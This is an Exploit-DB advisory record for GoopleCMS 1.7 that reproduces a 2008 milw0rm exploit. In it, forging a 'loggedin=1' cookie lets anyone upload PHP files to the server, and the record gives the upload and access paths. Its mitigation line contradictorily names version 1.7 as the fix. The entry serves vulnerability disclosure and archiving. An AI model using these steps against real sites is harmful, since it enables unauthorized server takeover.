Goople Cms (1.7)

vendor:

GoopleCMS

by:

BeyazKurt

7.5

CVSS

HIGH

Remote File Upload

434

CWE

Product Name: GoopleCMS

Affected Version From: 1.7

Affected Version To: 1.7

Patch Exists: YES

Related CWE: N/A

CPE: a:gooplecms:goople_cms:1.7

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2008

A vulnerability exists in Goople Cms (1.7) which allows an attacker to upload arbitrary files on the server. An attacker can exploit this vulnerability by setting the 'loggedin' cookie to '1' and then uploading a malicious file on the server. The malicious file can be accessed at http://SITE/user/doc/FILE.

Mitigation:

Upgrade to the latest version of Goople Cms (1.7)

Source

Exploit-DB raw data:

#######################################################
# Author : BeyazKurt
# Contact : BeyazKurt@BSDMail.Com
# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
#
# Script : Goople Cms (1.7)
# Download : http://ovh.dl.sourceforge.net/sourceforge/gooplecms/GoopleCMS_1.7.rar
# 
# Exploit : 
# Open : http://SITE/win/upload.php
# javascript:document.cookie = "loggedin=1; path=/";
# Copy/paste and go and back and upload PHP/HTML etc.. file. (and ingilizceme sokiyim :D )
# File : http://SITE/user/doc/FILE (or your select)
# -------------------------------
#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
#                       Rinia ShqiptaRe  :) 
#                       Proud 2 Be MUSLIM !
#                      Proud 2 Be ALBANIAN !
#######################################################

# milw0rm.com [2008-11-23]